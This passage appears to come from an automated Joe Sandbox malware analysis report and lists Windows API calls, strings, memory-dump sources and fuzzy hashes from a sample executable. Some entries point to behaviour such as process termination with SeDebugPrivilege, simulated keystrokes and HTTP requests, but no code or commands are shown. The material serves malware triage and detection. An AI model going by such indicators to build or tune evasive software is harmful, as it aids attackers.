                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00950268,?,00000001), ref: 00951257
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 0095129C
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 009512B1
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00950268,?,00000001), ref: 009512BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: f6e0fa9ded0bf847287a8fa57f65cac2f23fd183f351db1ef7280f6fd9506446
                                                                  • Instruction ID: deba6adac74a7e72d7199b92e26b2ee5500e28643e1d486eccbcb136396beb2a
                                                                  • Opcode Fuzzy Hash: f6e0fa9ded0bf847287a8fa57f65cac2f23fd183f351db1ef7280f6fd9506446
                                                                  • Instruction Fuzzy Hash: 5A31EE76A28208FBDB10DF51ED88F7937ADEB54722F104225FC14D61A0D778ADC4AB60
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008FFAA6
                                                                  • OleUninitialize.OLE32(?,00000000), ref: 008FFB45
                                                                  • UnregisterHotKey.USER32(?), ref: 008FFC9C
                                                                  • DestroyWindow.USER32(?), ref: 009345D6
                                                                  • FreeLibrary.KERNEL32(?), ref: 0093463B
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00934668
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: c06c094f0dddc8967f120d0afdd5af7cf02d412c8258c1c7808cabfd4775cb6f
                                                                  • Instruction ID: 63472aa78961c208777c8a930966bbf55bb10e0602050de00594e8d654283257
                                                                  • Opcode Fuzzy Hash: c06c094f0dddc8967f120d0afdd5af7cf02d412c8258c1c7808cabfd4775cb6f
                                                                  • Instruction Fuzzy Hash: 5CA16C3170121ACFDB18EF24C5A5A79F364FF45714F1142ADEA0AAB262CB30AD56CF51
                                                                  APIs
                                                                  • EnumChildWindows.USER32(?,0094A439), ref: 0094A377
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                  • API String ID: 3555792229-1603158881
                                                                  • Opcode ID: 77cc4ee673e66ee155a0cf7d7b244fb33f862705c49fe78cdd373c8ba4f4c640
                                                                  • Instruction ID: b91a5bd3e171c6204cbb3fdd03ebfee70aa13c400580c9debb00f9ee0141eaee
                                                                  • Opcode Fuzzy Hash: 77cc4ee673e66ee155a0cf7d7b244fb33f862705c49fe78cdd373c8ba4f4c640
                                                                  • Instruction Fuzzy Hash: AF91E43164060AAADB18DFA0C852FEEFBB8FF84300F508119E859A7141DF716999DBD1
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 008F2EAE
                                                                    • Part of subcall function 008F1DB3: GetClientRect.USER32(?,?), ref: 008F1DDC
                                                                    • Part of subcall function 008F1DB3: GetWindowRect.USER32(?,?), ref: 008F1E1D
                                                                    • Part of subcall function 008F1DB3: ScreenToClient.USER32(?,?), ref: 008F1E45
                                                                  • GetDC.USER32 ref: 0092CD32
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0092CD45
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0092CD53
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0092CD68
                                                                  • ReleaseDC.USER32(?,00000000), ref: 0092CD70
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0092CDFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 8a746a4ab1aa9539dd2465410ed7d1153943bab95f3fe2493b58d8452aef66d7
                                                                  • Instruction ID: c62e0470fc7af390452b974ba7d5cb3a205bfe6e8df414a12e1e467d133481d8
                                                                  • Opcode Fuzzy Hash: 8a746a4ab1aa9539dd2465410ed7d1153943bab95f3fe2493b58d8452aef66d7
                                                                  • Instruction Fuzzy Hash: FE71C371500209DFCF21DF64D894ABE7BB9FF48324F24467AED599A2AAC7308C80DB50
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00961A50
                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00961A7C
                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00961ABE
                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00961AD3
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00961AE0
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00961B10
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00961B57
                                                                    • Part of subcall function 00962483: GetLastError.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 00962498
                                                                    • Part of subcall function 00962483: SetEvent.KERNEL32(?,?,00961817,00000000,00000000,00000001), ref: 009624AD
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                  • String ID:
                                                                  • API String ID: 2603140658-3916222277
                                                                  • Opcode ID: 38d89ea3f52a4a25bb88b73d1598aff7ef1d072baf1e92f7bf04b12ca4267c3c
                                                                  • Instruction ID: 2264e80f47b33e9fb6796d9c16bf9ef3d421aaf913d65af35a367fc59169ee44
                                                                  • Opcode Fuzzy Hash: 38d89ea3f52a4a25bb88b73d1598aff7ef1d072baf1e92f7bf04b12ca4267c3c
                                                                  • Instruction Fuzzy Hash: 2541A1B1501608BFEB158F60CC95FFB7BACEF08354F048126F905AA145E7749E409BA4
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0097F910), ref: 00968D28
                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0097F910), ref: 00968D5C
                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00968ED6
                                                                  • SysFreeString.OLEAUT32(?), ref: 00968F00
                                                                  Similarity
                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                  • String ID:
                                                                  • API String ID: 560350794-0
                                                                  • Opcode ID: 39315ae7e237d31215bbcbfe141705d169c9e2fcf51e32696365b86f7222b4a3
                                                                  • Instruction ID: d911d828b6c53bc41d5dca5a1a599040ac2c5bf29820e9acd0d98c210f8b55d4
                                                                  • Opcode Fuzzy Hash: 39315ae7e237d31215bbcbfe141705d169c9e2fcf51e32696365b86f7222b4a3
                                                                  • Instruction Fuzzy Hash: EEF14C71A00209EFCF14DF94C888EAEB7B9FF49314F108599F915AB251DB31AE45CB91
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096F6B5
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096F848
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0096F86C
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096F8AC
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0096F8CE
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096FA4A
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0096FA7C
                                                                  • CloseHandle.KERNEL32(?), ref: 0096FAAB
                                                                  • CloseHandle.KERNEL32(?), ref: 0096FB22
                                                                  Similarity
                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                  • String ID:
                                                                  • API String ID: 4090791747-0
                                                                  • Opcode ID: d17dede3de110fb654e997765af5e64e20318e28147b065b07298079aba180b8
                                                                  • Instruction ID: 87e007d93bd785df7bdf32afcf7ba2d568abdd04b695bd50cfc516463d32818e
                                                                  • Opcode Fuzzy Hash: d17dede3de110fb654e997765af5e64e20318e28147b065b07298079aba180b8
                                                                  • Instruction Fuzzy Hash: A8E1BD316042049FCB14EF34D8A1B6ABBE5FF85354F14896DF8999B2A2CB31DC45CB52
                                                                  APIs
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00953697,?), ref: 0095468B
                                                                    • Part of subcall function 0095466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00953697,?), ref: 009546A4
                                                                    • Part of subcall function 00954A31: GetFileAttributesW.KERNEL32(?,0095370B), ref: 00954A32
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00954D40
                                                                  • _wcscmp.LIBCMT ref: 00954D5A
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00954D75
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 793581249-0
                                                                  • Opcode ID: b1422b4e8a1296351b569dab956f62d3b690b538c70ee5a1ed63c918231d3b7a
                                                                  • Instruction ID: 265836493e2c8589aa5cd5dd18b5a74ee48ed8417339ecad572092cf364d9ee4
                                                                  • Opcode Fuzzy Hash: b1422b4e8a1296351b569dab956f62d3b690b538c70ee5a1ed63c918231d3b7a
                                                                  • Instruction Fuzzy Hash: 785163B21083459BC764EBA5D881ADFB3ECAF84355F40092EF689D3191EE34A5CCC766
                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009786FF
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: e88c44c90a4fe4d6fb86276e21e91e2a876efa7d05bf5ad548f88332bed7bbb3
                                                                  • Instruction ID: 73cca1f0973f2bf20d568ee2cb805df52021f972eb6085ce60184eaffcb55c4f
                                                                  • Opcode Fuzzy Hash: e88c44c90a4fe4d6fb86276e21e91e2a876efa7d05bf5ad548f88332bed7bbb3
                                                                  • Instruction Fuzzy Hash: B051B532684244BEDB249B28CC8DFAE7B68FB05720F608615F91DE61A1CF75A980DB51
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0092C2F7
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0092C319
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0092C331
                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0092C34F
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0092C370
                                                                  • DestroyIcon.USER32(00000000), ref: 0092C37F
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0092C39C
                                                                  • DestroyIcon.USER32(?), ref: 0092C3AB
                                                                    • Part of subcall function 0097A4AF: DeleteObject.GDI32(00000000), ref: 0097A4E8
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 2819616528-0
                                                                  • Opcode ID: ec185eb3f271408f2a29a82fdef8a9de11b1091aea1a77b73f462d5576ccdf30
                                                                  • Instruction ID: ab6a662f6f3e99a3fa755fc6976132b2b367603ab801f4b8a901ff51133f7390
                                                                  • Opcode Fuzzy Hash: ec185eb3f271408f2a29a82fdef8a9de11b1091aea1a77b73f462d5576ccdf30
                                                                  • Instruction Fuzzy Hash: BC516971610209EFDB24DF65DC45BAE37A9FB48720F104628FA06E72A0DB70AD90EB50
                                                                  APIs
                                                                    • Part of subcall function 0094A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0094A84C
                                                                    • Part of subcall function 0094A82C: GetCurrentThreadId.KERNEL32 ref: 0094A853
                                                                    • Part of subcall function 0094A82C: AttachThreadInput.USER32(00000000,?,00949683,?,00000001), ref: 0094A85A
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0094968E
                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009496AB
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009496AE
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009496B7
                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009496D5
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009496D8
                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009496E1
                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009496F8
                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009496FB
                                                                  Similarity
                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                  • String ID:
                                                                  • API String ID: 2014098862-0
                                                                  • Opcode ID: 9d8ec049aed6627aba13e1b2acdc423887ee72eb386854b1cb24cc079e4092ba
                                                                  • Instruction ID: f0fe3f5674a3551471bc2b217a4d4eaa87bebfa494ccc7fed5a2fca8f3db71f5
                                                                  • Opcode Fuzzy Hash: 9d8ec049aed6627aba13e1b2acdc423887ee72eb386854b1cb24cc079e4092ba
                                                                  • Instruction Fuzzy Hash: 0511E572964218BEF7106F60DC49F6A3B1DDB8C760F510425F248AB1A0C9F25C50EAB4
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0094853C,00000B00,?,?), ref: 0094892A
                                                                  • HeapAlloc.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 00948931
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0094853C,00000B00,?,?), ref: 00948946
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0094853C,00000B00,?,?), ref: 0094894E
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 00948951
                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0094853C,00000B00,?,?), ref: 00948961
                                                                  • GetCurrentProcess.KERNEL32(0094853C,00000000,?,0094853C,00000B00,?,?), ref: 00948969
                                                                  • DuplicateHandle.KERNEL32(00000000,?,0094853C,00000B00,?,?), ref: 0094896C
                                                                  • CreateThread.KERNEL32(00000000,00000000,00948992,00000000,00000000,00000000), ref: 00948986
                                                                  Similarity
                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                  • String ID:
                                                                  • API String ID: 1957940570-0
                                                                  • Opcode ID: 26b129d583963b4514c909fdaa20488123c3485e7c411c0b06dc4d4f44df9506
                                                                  • Instruction ID: 580bc244ecbdf7ee7a9f4d6969f8e8b761199f4498887505f8fe8fc1eb1a9705
                                                                  • Opcode Fuzzy Hash: 26b129d583963b4514c909fdaa20488123c3485e7c411c0b06dc4d4f44df9506
                                                                  • Instruction Fuzzy Hash: 6101BF76258704FFE710ABA5DC4DF6B3B6CEB89711F404421FA09DB291CA709840DB30
                                                                  Strings
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 0-572801152
                                                                  • Opcode ID: 641f54a744a4bf2c1d74e6ff7b7334702a93c15080de7ba93043c4593d503b7e
                                                                  • Instruction ID: adb48224ed4d907a80b6ebe6692a0096d927b963857bb9895c375b50a0f0acff
                                                                  • Opcode Fuzzy Hash: 641f54a744a4bf2c1d74e6ff7b7334702a93c15080de7ba93043c4593d503b7e
                                                                  • Instruction Fuzzy Hash: BDC19371A0021A9FDF10DFA8D984BAEB7FDFB88314F148469E909A7280E7719D45CB90
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                  • API String ID: 2862541840-625585964
                                                                  APIs
                                                                    • Part of subcall function 0094710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?,?,00947455), ref: 00947127
                                                                    • Part of subcall function 0094710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947142
                                                                    • Part of subcall function 0094710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947150
                                                                    • Part of subcall function 0094710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?), ref: 00947160
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00969806
                                                                  • _memset.LIBCMT ref: 00969813
                                                                  • _memset.LIBCMT ref: 00969956
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00969982
                                                                  • CoTaskMemFree.OLE32(?), ref: 0096998D
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 009699DB
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00976E24
                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00976E38
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00976E52
                                                                  • _wcscat.LIBCMT ref: 00976EAD
                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00976EC4
                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00976EF2
                                                                  Similarity
                                                                  • API ID: MessageSend$Window_wcscat
                                                                  • String ID: SysListView32
                                                                  • API String ID: 307300125-78025650
                                                                  APIs
                                                                    • Part of subcall function 00953C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00953C7A
                                                                    • Part of subcall function 00953C55: Process32FirstW.KERNEL32(00000000,?), ref: 00953C88
                                                                    • Part of subcall function 00953C55: CloseHandle.KERNEL32(00000000), ref: 00953D52
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096E9A4
                                                                  • GetLastError.KERNEL32 ref: 0096E9B7
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0096E9E6
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0096EA63
                                                                  • GetLastError.KERNEL32(00000000), ref: 0096EA6E
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0096EAA3
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00953033
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00954312
                                                                  • LoadStringW.USER32(00000000), ref: 00954319
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0095432F
                                                                  • LoadStringW.USER32(00000000), ref: 00954336
                                                                  • _wprintf.LIBCMT ref: 0095435C
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0095437A
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00954357
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0097D47C
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0097D49C
                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0097D6D7
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0097D6F5
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0097D716
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 0097D735
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0097D75A
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0097D77D
                                                                  Similarity
                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                  • String ID:
                                                                  • API String ID: 1211466189-0
                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 008F2ACF
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 008F2B17
                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 0092C21A
                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0092C1C7,00000004,00000000,00000000,00000000), ref: 0092C286
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 009570DD
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00957114
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00957130
                                                                  • _memmove.LIBCMT ref: 0095717E
                                                                  • _memmove.LIBCMT ref: 0095719B
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 009571AA
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009571BF
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 009571DE
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 256516436-0
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 009761EB
                                                                  • GetDC.USER32(00000000), ref: 009761F3
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009761FE
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0097620A
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00976246
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00976257
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0097902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00976291
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009762B1
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: 16d0e43f3e3d73679de5650b47894d0a1826eaae865f8775ad16ec8a000c04bf
                                                                  • Instruction ID: 6401328b65b9780f4a9427deafa13551977dfdd6d9aba489e0085e603a52d896
                                                                  • Opcode Fuzzy Hash: 16d0e43f3e3d73679de5650b47894d0a1826eaae865f8775ad16ec8a000c04bf
                                                                  • Instruction Fuzzy Hash: 0131AD72215214BFEF108F10CC8AFEA3BADEF49725F044065FE0CEA292D6759881CB60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 1a1f7366855c6b0ed4d4e53eec194ff4b4c6d65bef528b45c9509f0fb08d57e7
                                                                  • Instruction ID: d4238a94ed2d758dce5116a470baccfde18a1ca5a52c76230c6c5366f5a2eb74
                                                                  • Opcode Fuzzy Hash: 1a1f7366855c6b0ed4d4e53eec194ff4b4c6d65bef528b45c9509f0fb08d57e7
                                                                  • Instruction Fuzzy Hash: B621DC7170120A7BE60477259DC2FFB775DEE9178CF084429FE089A683EB68DE1182A1
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • _wcstok.LIBCMT ref: 0095EC94
                                                                  • _wcscpy.LIBCMT ref: 0095ED23
                                                                  • _memset.LIBCMT ref: 0095ED56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
